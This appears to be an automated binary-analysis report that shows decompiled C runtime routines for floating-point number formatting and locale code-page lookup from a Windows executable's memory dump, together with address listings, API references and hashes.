										_t1150 = 0;
										__eflags = 0;
										_t1004 = 0xa;
										do {
											_t801 =  *(_t1212 + _t1150 * 4 - 0x1d0);
											_t1107 = _t801 * _t1004 >> 0x20;
											 *(_t1212 + _t1150 * 4 - 0x1d0) = _t801 * _t1004 + _t1186;
											asm("adc edx, 0x0");
											_t1150 = _t1150 + 1;
											_t1186 = _t1107;
											__eflags = _t1150 - _t1040;
										} while (_t1150 != _t1040);
										_v1912 = _t1186;
										__eflags = _t1186;
										_t1184 = _v1876;
										if(_t1186 != 0) {
											_t1049 = _v472;
											__eflags = _t1049 - 0x73;
											if(_t1049 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E0041FD4C( &_v468, 0x1cc,  &_v2404, 0);
												_t1218 =  &(_t1218[4]);
											} else {
												 *(_t1212 + _t1049 * 4 - 0x1d0) = _t1107;
												_v472 = _v472 + 1;
											}
										}
										_t1146 = _t1184;
									}
									_t775 = E00421620( &_v472,  &_v936);
									__eflags = _t775 - 0xa;
									if(_t775 != 0xa) {
										__eflags = _t775;
										if(_t775 != 0) {
											_t776 = _t775 + 0x30;
											__eflags = _t776;
											_t1184 = _t1146 + 1;
											 *_t1146 = _t776;
											goto L282;
										} else {
											_t777 = _v1900 - 1;
										}
									} else {
										_v1900 = _v1900 + 1;
										_t1184 = _t1146 + 1;
										_t792 = _v936;
										 *_t1146 = 0x31;
										_v1876 = _t1184;
										__eflags = _t792;
										if(_t792 != 0) {
											_t1149 = 0;
											_t1185 = _t792;
											_t1048 = 0;
											__eflags = 0;
											_t1002 = 0xa;
											do {
												_t793 =  *(_t1212 + _t1048 * 4 - 0x3a0);
												 *(_t1212 + _t1048 * 4 - 0x3a0) = _t793 * _t1002 + _t1149;
												asm("adc edx, 0x0");
												_t1048 = _t1048 + 1;
												_t1149 = _t793 * _t1002 >> 0x20;
												__eflags = _t1048 - _t1185;
											} while (_t1048 != _t1185);
											_t1184 = _v1876;
											__eflags = _t1149;
											if(_t1149 != 0) {
												_t796 = _v936;
												__eflags = _t796 - 0x73;
												if(_t796 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E0041FD4C( &_v932, 0x1cc,  &_v2404, 0);
													_t1218 =  &(_t1218[4]);
												} else {
													 *(_t1212 + _t796 * 4 - 0x3a0) = _t1149;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t777 = _v1900;
									}
									 *(_v1924 + 4) = _t777;
									_t1026 = _v1920;
									__eflags = _t777;
									if(_t777 >= 0) {
										__eflags = _t1026 - 0x7fffffff;
										if(_t1026 <= 0x7fffffff) {
											_t1026 = _t1026 + _t777;
											__eflags = _t1026;
										}
									}
									_t779 = _a24 - 1;
									__eflags = _t779 - _t1026;
									if(_t779 >= _t1026) {
										_t779 = _t1026;
									}
									_t734 = _t779 + _v1904;
									_v1920 = _t734;
									__eflags = _t1184 - _t734;
									if(__eflags != 0) {
										while(1) {
											_t734 = _v472;
											__eflags = _t734;
											if(__eflags == 0) {
												goto L303;
											}
											_t1147 = 0;
											_t1000 = _t734;
											_t1044 = 0;
											__eflags = 0;
											do {
												_t780 =  *(_t1212 + _t1044 * 4 - 0x1d0);
												 *(_t1212 + _t1044 * 4 - 0x1d0) = _t780 * 0x3b9aca00 + _t1147;
												asm("adc edx, 0x0");
												_t1044 = _t1044 + 1;
												_t1147 = _t780 * 0x3b9aca00 >> 0x20;
												__eflags = _t1044 - _t1000;
											} while (_t1044 != _t1000);
											__eflags = _t1147;
											if(_t1147 != 0) {
												_t786 = _v472;
												__eflags = _t786 - 0x73;
												if(_t786 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E0041FD4C( &_v468, 0x1cc,  &_v2404, 0);
													_t1218 =  &(_t1218[4]);
												} else {
													 *(_t1212 + _t786 * 4 - 0x1d0) = _t1147;
													_v472 = _v472 + 1;
												}
											}
											_t785 = E00421620( &_v472,  &_v936);
											_t1148 = 8;
											_t1026 = _v1920 - _t1184;
											__eflags = _t1026;
											do {
												_t707 = _t785 % _v1888;
												_t785 = _t785 / _v1888;
												_t1105 = _t707 + 0x30;
												__eflags = _t1026 - _t1148;
												if(_t1026 >= _t1148) {
													 *((char*)(_t1148 + _t1184)) = _t1105;
												}
												_t1148 = _t1148 - 1;
												__eflags = _t1148 - 0xffffffff;
											} while (_t1148 != 0xffffffff);
											__eflags = _t1026 - 9;
											if(_t1026 > 9) {
												_t1026 = 9;
											}
											_t1184 = _t1184 + _t1026;
											__eflags = _t1184 - _v1920;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1184 = 0;
									goto L304;
								}
							}
						}
					}
				} else {
					_t1026 = _t1174 & 0x000fffff;
					if((_t990 | _t1174 & 0x000fffff) != 0) {
						goto L11;
					} else {
						_push(0x441a60);
						_push(_a24);
						 *(_v1924 + 4) =  *(_v1924 + 4) & 0x00000000;
						_push(_t1093);
						L311:
						_t734 = E00424E16();
						_t1215 =  &(_t1214[3]);
						if(_t734 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_t736 = E0041A842();
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t1217 = _t1215 - 0x00000008 & 0xfffffff0;
							__eflags = _t1217;
							 *_t1217 = _t1228;
							asm("movq xmm0, [esp]");
							return E004324DE(_t736, _t1093, _t1212);
						} else {
							L304:
							_t1226 = _v1936;
							if(_v1936 != 0) {
								_t734 = E00434F53(_t1026, _t1226,  &_v1944);
							}
							E00415A87();
							return _t734;
						}
					}
				}
			}

0x00431159
0x00431159
0x00431159
0x00431159
0x00431164
0x0043116b
0x00431171
0x0043117a
0x00431187
0x00431198
0x004311aa
0x004311b0
0x0043119a
0x0043119a
0x0043119a
0x004311b7
0x004311b8
0x004311bb
0x004311bc
0x004311bf
0x004311c2
0x004311c3
0x004311c5
0x004311d2
0x004311cd
0x004311cf
0x004311cf
0x004311d4
0x004311da
0x004311e0
0x004311e4
0x004311f1
0x00431219
0x0043121d
0x00431223
0x00431225
0x0043122d
0x0043122d
0x00431234
0x00431234
0x00431237
0x004324a1
0x00000000
0x0043123d
0x0043123d
0x0043123d
0x00431240
0x00432484
0x00000000
0x00431246
0x00431246
0x00431246
0x00431249
0x0043247d
0x00000000
0x0043124f
0x0043124f
0x00431252
0x00432476
0x00432489
0x00432489
0x0043248c
0x00432492
0x00000000
0x00431258
0x00431261
0x00431269
0x0043126c
0x0043126f
0x00431272
0x00431278
0x00431280
0x00431286
0x00431290
0x00431290
0x00431293
0x0043129c
0x004312a3
0x004312a3
0x00431295
0x00431299
0x00431299
0x004312ab
0x004312b3
0x004312b9
0x004312bb
0x004312c4
0x004312ca
0x004312cf
0x004312d0
0x004312d1
0x004312e0
0x004312e2
0x004312ea
0x004312eb
0x004312f1
0x004312fb
0x004312fb
0x004312fd
0x004312f3
0x004312f3
0x004312f9
0x00000000
0x00000000
0x004312f9
0x00431303
0x00431311
0x00431313
0x0043131c
0x00431322
0x00431329
0x0043132a
0x00431330
0x00431336
0x00431718
0x0043171b
0x00431833
0x00431833
0x0043183a
0x0043183a
0x0043183a
0x00431841
0x00431844
0x00431849
0x00431849
0x00431846
0x00431846
0x00431846
0x0043184b
0x0043184d
0x0043184d
0x00431855
0x0043185b
0x0043185d
0x00431860
0x00431866
0x00431868
0x00431868
0x0043186a
0x0043187b
0x0043187b
0x0043187b
0x0043186c
0x00431873
0x00431873
0x00431882
0x00431885
0x00431887
0x0043188d
0x0043188d
0x00431889
0x00431889
0x00431889
0x00431895
0x0043189f
0x004318a6
0x004318a7
0x004318aa
0x00000000
0x00000000
0x004318ac
0x004318ac
0x004318b4
0x004318ba
0x004318bd
0x004318ca
0x004318bf
0x004318c2
0x004318c2
0x004318e3
0x004318ef
0x004318fc
0x004318fe
0x00431721
0x00431721
0x00431728
0x00431732
0x0043173c
0x0043173e
0x00431744
0x00431744
0x00431746
0x00431746
0x0043174d
0x00431754
0x00000000
0x00000000
0x0043175a
0x0043175d
0x00431760
0x00000000
0x00431762
0x00431762
0x00431762
0x00431762
0x00431769
0x0043176c
0x00431771
0x00431771
0x0043176e
0x0043176e
0x0043176e
0x00431773
0x00431775
0x00431775
0x0043177d
0x00431783
0x00431785
0x00431788
0x0043178e
0x00431790
0x00431790
0x00431792
0x004317a3
0x004317a3
0x004317a3
0x00431794
0x0043179b
0x0043179b
0x004317aa
0x004317ad
0x004317af
0x004317b5
0x004317b5
0x004317b1
0x004317b1
0x004317b1
0x004317bd
0x004317c8
0x004317cf
0x004317d0
0x004317d3
0x00000000
0x00000000
0x004317d5
0x004317d5
0x004317dd
0x004317e3
0x004317e6
0x004317f3
0x004317e8
0x004317eb
0x004317eb
0x0043180c
0x00431818
0x00431827
0x00431827
0x00000000
0x00431760
0x00431746
0x00000000
0x0043173e
0x00431905
0x00431905
0x00431908
0x0043190d
0x00431913
0x00431919
0x0043192c
0x00431931
0x0043133c
0x0043133c
0x00431343
0x0043134d
0x00431357
0x00431359
0x00431555
0x00431555
0x00431561
0x00431564
0x00431569
0x00431571
0x00431578
0x0043157e
0x00431583
0x0043158a
0x0043158b
0x0043158b
0x0043158b
0x00431592
0x00431595
0x0043159d
0x004315a3
0x004315aa
0x004315aa
0x004315a5
0x004315a5
0x004315a5
0x004315ac
0x004315af
0x004315b1
0x004315b7
0x004315bd
0x004315c0
0x004315ce
0x004315ce
0x004315ce
0x004315c2
0x004315c2
0x004315c8
0x00000000
0x004315ca
0x004315ca
0x004315ca
0x004315c8
0x004315d0
0x004315d3
0x004316c6
0x004316c6
0x004316c8
0x004316ce
0x004316d4
0x004316e9
0x004316ee
0x004315d9
0x004315d9
0x004315db
0x00000000
0x004315e1
0x004315e1
0x004315e4
0x004315e8
0x004315e9
0x004315e9
0x004315ef
0x004315f1
0x004315f7
0x004315fa
0x00431600
0x00431608
0x00431608
0x00431610
0x00431613
0x00431613
0x00431615
0x00000000
0x00000000
0x00431617
0x00431619
0x0043161f
0x0043161f
0x0043161b
0x0043161b
0x0043161b
0x00431621
0x0043162a
0x0043162c
0x00431633
0x00431633
0x0043162e
0x0043162e
0x0043162e
0x0043163b
0x0043165a
0x00431662
0x00431669
0x0043166a
0x0043166b
0x00431671
0x00431674
0x00431676
0x00000000
0x00431676
0x00000000
0x00431674
0x0043167e
0x00431684
0x0043168a
0x0043168a
0x00431690
0x00431692
0x0043169c
0x0043169e
0x0043169e
0x004316a0
0x004316a0
0x004316a6
0x004316ab
0x004316b1
0x004316be
0x004316b3
0x004316b6
0x004316b6
0x004316b1
0x004315db
0x004316f1
0x004316fb
0x00431705
0x0043170b
0x00431711
0x0043135f
0x0043135f
0x0043135f
0x00431361
0x00431368
0x0043136f
0x00000000
0x00000000
0x00431375
0x00431378
0x0043137b
0x00000000
0x0043137d
0x0043137d
0x00431389
0x0043138c
0x00431391
0x00431399
0x004313a0
0x004313a6
0x004313ab
0x004313b2
0x004313b3
0x004313b3
0x004313b3
0x004313ba
0x004313bd
0x004313c5
0x004313cb
0x004313d2
0x004313d2
0x004313cd
0x004313cd
0x004313cd
0x004313d4
0x004313d7
0x004313d9
0x004313df
0x004313e5
0x004313e8
0x004313f6
0x004313f6
0x004313f6
0x004313ea
0x004313ea
0x004313f0
0x00000000
0x004313f2
0x004313f2
0x004313f2
0x004313f0
0x004313f8
0x004313fb
0x004314ee
0x004314ee
0x004314f0
0x004314f6
0x004314fc
0x00431511
0x00431516
0x00431401
0x00431401
0x00431403
0x00000000
0x00431409
0x00431409
0x0043140c
0x00431410
0x00431411
0x00431411
0x00431417
0x00431419
0x0043141f
0x00431422
0x00431428
0x00431430
0x00431430
0x00431438
0x0043143b
0x0043143b
0x0043143d
0x00000000
0x00000000
0x0043143f
0x00431441
0x00431447
0x00431447
0x00431443
0x00431443
0x00431443
0x00431449
0x00431452
0x00431454
0x0043145b
0x0043145b
0x00431456
0x00431456
0x00431456
0x00431463
0x00431482
0x0043148a
0x00431491
0x00431492
0x00431493
0x00431499
0x0043149c
0x0043149e
0x00000000
0x0043149e
0x00000000
0x0043149c
0x004314a6
0x004314ac
0x004314b2
0x004314b2
0x004314b8
0x004314ba
0x004314c4
0x004314c6
0x004314c6
0x004314c8
0x004314c8
0x004314ce
0x004314d3
0x004314d9
0x004314e6
0x004314db
0x004314de
0x004314de
0x004314d9
0x00431403
0x00431519
0x00431524
0x00431525
0x00431526
0x0043152c
0x00431532
0x00431538
0x00431538
0x00000000
0x0043137b
0x00000000
0x00431361
0x00431539
0x0043153f
0x00431546
0x00431547
0x00431548
0x0043154d
0x0043154d
0x00431934
0x0043193e
0x0043193f
0x00431945
0x00431947
0x00431da7
0x00431da9
0x00431dab
0x00431db1
0x00431db3
0x00431db9
0x00431dbb
0x00432108
0x00432108
0x0043210a
0x00432110
0x00432117
0x0043211d
0x0043211f
0x004321bd
0x004321bd
0x004321bf
0x004321c0
0x004321c6
0x00000000
0x00432125
0x00432125
0x00432128
0x0043212e
0x00432134
0x00432136
0x0043213c
0x0043213e
0x0043213e
0x00432140
0x00432140
0x00432149
0x00432150
0x00432156
0x00432159
0x0043215a
0x0043215c
0x0043215c
0x00432160
0x00432162
0x00432164
0x0043216a
0x0043216d
0x00000000
0x0043216f
0x0043216f
0x00432176
0x00432176
0x0043216d
0x00432162
0x00432136
0x00432128
0x0043211f
0x00431dc1
0x00431dc1
0x00431dc1
0x00431dc4
0x00431dc8
0x00431dc8
0x00431dc9
0x00431ddb
0x00431de8
0x00431df7
0x00431e21
0x00431e26
0x00431e2c
0x00431e2f
0x00431e32
0x00431ec8
0x00431ecf
0x00431f55
0x00431f5b
0x00431f61
0x00431f61
0x00431f61
0x00431f64
0x00431f66
0x00431f66
0x00431f6c
0x00431f72
0x00431f78
0x00431f7a
0x00431f7c
0x00431f7c
0x00431f82
0x00431f88
0x00431f8a
0x00431f96
0x00431f9c
0x00431f8c
0x00431f8c
0x00431f8e
0x00431f8e
0x00431fa2
0x00431fa4
0x00431fa6
0x00431fa6
0x00431fac
0x00431fae
0x00431fb0
0x00431fb6
0x00431fb8
0x004320bf
0x004320bf
0x004320c5
0x004320c5
0x004320c8
0x004320c9
0x00000000
0x00431fbe
0x00431fbe
0x00431fbe
0x00431fc2
0x00431fe2
0x00431fe4
0x00431fe6
0x00431fec
0x00431ff2
0x00431ff4
0x004320a1
0x004320a1
0x004320a4
0x00000000
0x004320aa
0x004320aa
0x004320b0
0x00000000
0x004320b0
0x00431ffa
0x00431ffa
0x00431ffa
0x00431ffd
0x00000000
0x00000000
0x00431fff
0x00432001
0x00432009
0x00432012
0x00432012
0x00432014
0x00432014
0x00432026
0x00432029
0x0043202f
0x00432038
0x0043203b
0x00432048
0x0043204b
0x0043204c
0x0043204d
0x00432053
0x00432055
0x0043205b
0x00432061
0x00432067
0x00000000
0x00000000
0x00000000
0x00000000
0x00432069
0x00432069
0x00432069
0x0043206b
0x00000000
0x00000000
0x0043206d
0x00432070
0x00000000
0x00432076
0x00432076
0x00432078
0x0043207a
0x0043207a
0x0043207a
0x00432082
0x00432085
0x00432085
0x0043208b
0x0043208d
0x0043208f
0x00432096
0x0043209c
0x0043209e
0x00000000
0x0043209e
0x00000000
0x00432070
0x00000000
0x00432069
0x00000000
0x00431ffa
0x00431fc4
0x00431fc4
0x00431fc6
0x00431fcc
0x00431fd4
0x00431fd4
0x00431fd7
0x00431fd7
0x00000000
0x00431fc6
0x00000000
0x004320b6
0x004320b6
0x004320b7
0x004320b7
0x00000000
0x00431fbe
0x00431ed5
0x00431ed5
0x00431ee7
0x00431ef4
0x00431efc
0x00431f01
0x00431f04
0x00431f06
0x00000000
0x00431f0c
0x00431f0c
0x00431f0f
0x00000000
0x00431f15
0x00431f15
0x00431f1c
0x00000000
0x00431f22
0x00431f28
0x00431f2a
0x00431f30
0x00431f30
0x00431f32
0x00431f34
0x00431f34
0x00431f36
0x00431f3f
0x00431f46
0x00431f49
0x00431f4a
0x00431f4c
0x00431f4c
0x00000000
0x00431f50
0x00431f1c
0x00431f0f
0x00431f06
0x00431e38
0x00431e38
0x00431e3e
0x00431e40
0x00431e5c
0x00431e5f
0x00000000
0x00431e65
0x00431e65
0x00431e6c
0x00000000
0x00431e72
0x00431e78
0x00431e7a
0x00431e7a
0x00431e7c
0x00431e7e
0x00431e7e
0x00431e80
0x00431e89
0x00431e90
0x00431e93
0x00431e94
0x00431e96
0x00431e96
0x00431e9a
0x00431e9a
0x00431e9f
0x00431ea1
0x00000000
0x00431ea7
0x00431ea7
0x00431ead
0x00431eb0
0x0043217e
0x00432181
0x00432187
0x0043219c
0x004321a1
0x004321a4
0x00431eb6
0x00431eb6
0x00431ebd
0x00000000
0x00431ebd
0x00431eb0
0x00431ea1
0x00431e6c
0x00431e42
0x00431e42
0x00431e44
0x00431e4a
0x00431e50
0x00431e51
0x004320cf
0x004320cf
0x004320d6
0x004320d7
0x004320d8
0x004320dd
0x004320e0
0x004320e0
0x004320e0
0x00431e40
0x004320e2
0x004320e2
0x004320e4
0x004321ab
0x004321b2
0x004321b9
0x004321cc
0x004321d2
0x004321d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004320ea
0x004320f0
0x004320f0
0x004320f6
0x004320f6
0x00432102
0x00000000
0x00432102
0x0043194d
0x0043194d
0x0043194f
0x00431955
0x00431957
0x0043195d
0x0043195f
0x00431ccd
0x00431ccd
0x00431ccf
0x00431cd5
0x00431cdc
0x00431ce2
0x00431ce4
0x00431d43
0x00431d46
0x00431d4c
0x00431d52
0x00431d54
0x00431d5a
0x00431d5c
0x00431d5c
0x00431d5e
0x00431d5e
0x00431d67
0x00431d6e
0x00431d74
0x00431d77
0x00431d78
0x00431d7a
0x00431d7a
0x00431d7e
0x00431d80
0x00431d86
0x00431d8c
0x00431d8f
0x00000000
0x00431d95
0x00431d95
0x00431d9c
0x00431d9c
0x00431d8f
0x00431d80
0x00431d54
0x00431ce6
0x00431ce6
0x00431ce8
0x00431cee
0x00431cf4
0x00000000
0x00431cf4
0x00431ce4
0x00431965
0x00431965
0x00431965
0x00431968
0x0043196c
0x0043196c
0x0043196d
0x0043197f
0x0043198c
0x0043199b
0x004319c5
0x004319ca
0x004319d0
0x004319d3
0x004319d6
0x00431a4a
0x00431a51
0x00431b1e
0x00431b24
0x00431b2a
0x00431b2a
0x00431b2a
0x00431b2d
0x00431b2f
0x00431b2f
0x00431b35
0x00431b3b
0x00431b41
0x00431b43
0x00431b45
0x00431b45
0x00431b4b
0x00431b51
0x00431b53
0x00431b5f
0x00431b65
0x00431b55
0x00431b55
0x00431b57
0x00431b57
0x00431b6b
0x00431b6d
0x00431b6f
0x00431b6f
0x00431b75
0x00431b77
0x00431b79
0x00431b7f
0x00431b81
0x00431c88
0x00431c88
0x00431c8e
0x00431c8e
0x00000000
0x00431b87
0x00431b87
0x00431b87
0x00431b8b
0x00431bab
0x00431bad
0x00431baf
0x00431bb5
0x00431bbb
0x00431bbd
0x00431c6a
0x00431c6a
0x00431c6d
0x00000000
0x00431c73
0x00431c73
0x00431c79
0x00000000
0x00431c79
0x00431bc3
0x00431bc3
0x00431bc3
0x00431bc6
0x00000000
0x00000000
0x00431bc8
0x00431bca
0x00431bd2
0x00431bdb
0x00431bdb
0x00431bdd
0x00431bdd
0x00431bef
0x00431bf2
0x00431bf8
0x00431c01
0x00431c04
0x00431c11
0x00431c14
0x00431c15
0x00431c16
0x00431c1c
0x00431c1e
0x00431c24
0x00431c2a
0x00431c30
0x00000000
0x00000000
0x00000000
0x00000000
0x00431c32
0x00431c32
0x00431c32
0x00431c34
0x00000000
0x00000000
0x00431c36
0x00431c39
0x00431cf7
0x00431cf7
0x00431cf9
0x00431cff
0x00431d05
0x00431d06
0x00000000
0x00431c3f
0x00431c3f
0x00431c41
0x00431c43
0x00431c43
0x00431c43
0x00431c4b
0x00431c4e
0x00431c4e
0x00431c54
0x00431c56
0x00431c58
0x00431c5f
0x00431c65
0x00431c67
0x00000000
0x00431c67
0x00000000
0x00431c39
0x00000000
0x00431c32
0x00000000
0x00431bc3
0x00431b8d
0x00431b8d
0x00431b8f
0x00431b95
0x00431b9d
0x00431b9d
0x00431ba0
0x00431ba0
0x00000000
0x00431b8f
0x00000000
0x00431c7f
0x00431c7f
0x00431c80
0x00431c80
0x00000000
0x00431b87
0x00431a57
0x00431a57
0x00431a69
0x00431a76
0x00431a7e
0x00431a83
0x00431a86
0x00431a88
0x00431aa4
0x00431aa7
0x00000000
0x00431aad
0x00431aad
0x00431ab4
0x00000000
0x00431aba
0x00431ac0
0x00431ac2
0x00431ac8
0x00431ac8
0x00431aca
0x00431acc
0x00431acc
0x00431ace
0x00431ad7
0x00431ade
0x00431ae1
0x00431ae2
0x00431ae4
0x00431ae4
0x00000000
0x00431acc
0x00431ab4
0x00431a8a
0x00431a8c
0x00431a92
0x00431a98
0x00431a99
0x00000000
0x00431a99
0x00431a88
0x004319d8
0x004319d8
0x004319de
0x004319e0
0x004319f5
0x004319f8
0x00000000
0x004319fe
0x004319fe
0x00431a05
0x00000000
0x00431a0b
0x00431a11
0x00431a13
0x00431a13
0x00431a15
0x00431a17
0x00431a17
0x00431a19
0x00431a22
0x00431a29
0x00431a2c
0x00431a2d
0x00431a2f
0x00431a2f
0x00431ae8
0x00431ae8
0x00431aed
0x00431aef
0x00000000
0x00431af5
0x00431af5
0x00431afb
0x00431afe
0x00431a38
0x00431a3f
0x00000000
0x00431b04
0x00431b06
0x00431b0c
0x00431b12
0x00431b13
0x00431d0c
0x00431d0c
0x00431d13
0x00431d14
0x00431d15
0x00431d1a
0x00431d1d
0x00431d1d
0x00431afe
0x00431aef
0x00431a05
0x004319e2
0x004319e2
0x004319e4
0x004319ea
0x00431c91
0x00431c91
0x00431c92
0x00431c98
0x00431c98
0x00431c9f
0x00431ca0
0x00431ca1
0x00431ca6
0x00431ca9
0x00431ca9
0x00431ca9
0x004319e0
0x00431cab
0x00431cab
0x00431cad
0x00431d21
0x00431d28
0x00431d28
0x00431d28
0x00431d2f
0x00431d31
0x00431d37
0x00431d38
0x004321d9
0x004321d9
0x004321da
0x004321db
0x004321e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00431caf
0x00431cb5
0x00431cb5
0x00431cbb
0x00431cbb
0x00431cc7
0x00000000
0x00431cc7
0x0043195f
0x004321e3
0x004321e3
0x004321e9
0x004321eb
0x004321f1
0x004321f7
0x004321f9
0x004321fd
0x004321ff
0x004321ff
0x00432201
0x00432202
0x00432202
0x00432209
0x0043220d
0x00432214
0x00432217
0x00432218
0x0043221a
0x0043221a
0x0043221e
0x00432224
0x00432226
0x00432231
0x00432233
0x00432239
0x0043223c
0x0043224f
0x00432252
0x00432258
0x0043226d
0x00432272
0x0043223e
0x00432240
0x00432247
0x00432247
0x0043223c
0x00432275
0x00432275
0x00432285
0x0043228c
0x0043228f
0x0043232b
0x0043232d
0x00432338
0x00432338
0x0043233a
0x0043233d
0x00000000
0x0043232f
0x00432335
0x00432335
0x00432295
0x00432295
0x0043229b
0x0043229e
0x004322a4
0x004322a7
0x004322ad
0x004322af
0x004322b7
0x004322b9
0x004322bb
0x004322bb
0x004322bd
0x004322be
0x004322be
0x004322c9
0x004322d0
0x004322d3
0x004322d4
0x004322d6
0x004322d6
0x004322da
0x004322e5
0x004322e7
0x004322e9
0x004322ef
0x004322f2
0x00432306
0x0043230c
0x00432321
0x00432326
0x004322f4
0x004322f4
0x004322fb
0x004322fb
0x004322f2
0x004322e7
0x0043233f
0x0043233f
0x0043233f
0x0043234b
0x0043234e
0x00432354
0x00432356
0x00432358
0x0043235e
0x00432360
0x00432360
0x00432360
0x0043235e
0x00432365
0x00432366
0x00432368
0x0043236a
0x0043236a
0x0043236c
0x00432372
0x00432378
0x0043237a
0x00432380
0x00432380
0x00432386
0x00432388
0x00000000
0x00000000
0x0043238e
0x00432390
0x00432392
0x00432392
0x00432394
0x00432394
0x004323a4
0x004323ab
0x004323ae
0x004323af
0x004323b1
0x004323b1
0x004323ba
0x004323bc
0x004323be
0x004323c4
0x004323c7
0x004323d8
0x004323db
0x004323e1
0x004323f6
0x004323fb
0x004323c9
0x004323c9
0x004323d0
0x004323d0
0x004323c7
0x0043240c
0x0043241b
0x0043241c
0x0043241c
0x0043241e
0x00432420
0x00432420
0x00432426
0x00432429
0x0043242b
0x0043242d
0x0043242d
0x00432430
0x00432431
0x00432431
0x00432436
0x00432439
0x0043243d
0x0043243d
0x0043243e
0x00432440
0x00432446
0x00000000
0x00000000
0x00000000
0x00432446
0x00432380
0x0043244c
0x0043244c
0x00000000
0x0043244c
0x00431252
0x00431249
0x00431240
0x004311f3
0x004311f7
0x004311ff
0x00000000
0x00431201
0x00431207
0x0043120c
0x0043120f
0x00431213
0x00432493
0x00432493
0x00432498
0x0043249d
0x004324aa
0x004324ab
0x004324ac
0x004324ad
0x004324ae
0x004324af
0x004324b4
0x004324b5
0x004324b6
0x004324b7
0x004324b8
0x004324b9
0x004324ba
0x004324bb
0x004324bc
0x004324bd
0x004324be
0x004324bf
0x004324c6
0x004324c6
0x004324c9
0x004324cc
0x004324d7
0x0043249f
0x0043244f
0x0043244f
0x00432459
0x00432462
0x00432467
0x0043246d
0x00432475
0x00432475
0x0043249d
0x004311ff

APIs

__floor_pentium4.LIBCMT ref: 004312D4

Part of subcall function 00421620: __aulldvrm.LIBCMT ref: 0042170A
Part of subcall function 00421620: __aulldvrm.LIBCMT ref: 004218CA

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Part of subcall function 0041A842: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041A844
Part of subcall function 0041A842: GetCurrentProcess.KERNEL32(C0000417,?,0041370C), ref: 0041A867
Part of subcall function 0041A842: TerminateProcess.KERNEL32(00000000,?,0041370C), ref: 0041A86E

Strings

1#INF, xrefs: 004324A1
1#QNAN, xrefs: 00432484
1#SNAN, xrefs: 0043247D
1#IND, xrefs: 00432476

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeaturePresentProcessProcessor__aulldvrm$CurrentTerminate___raise_securityfailure__floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 2719626002-2761157908
Opcode ID: 7df8b337b1e6705a23294b09fb0067a340addf9cb3d87ee7ac3157202c98d45b
Instruction ID: ad82e70be537999ac8ba5abacaa068120c853be4d54f2cac4aedd0e1a577fb6b
Opcode Fuzzy Hash: 7df8b337b1e6705a23294b09fb0067a340addf9cb3d87ee7ac3157202c98d45b
Instruction Fuzzy Hash: ECC24A71E046288FDB25CE28DD407EAB3B5EB88314F1451EBD84EE7250E778AE858F45

Uniqueness

Uniqueness Score: 0.98%

Function 0042F97E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0042F97E(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0x51ceb70f
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x440bfc;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x440c04;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00424E70(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0x51ceb70f
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0042f983
0x0042f984
0x0042f98b
0x0042fa2f
0x0042fa3d
0x0042fa48
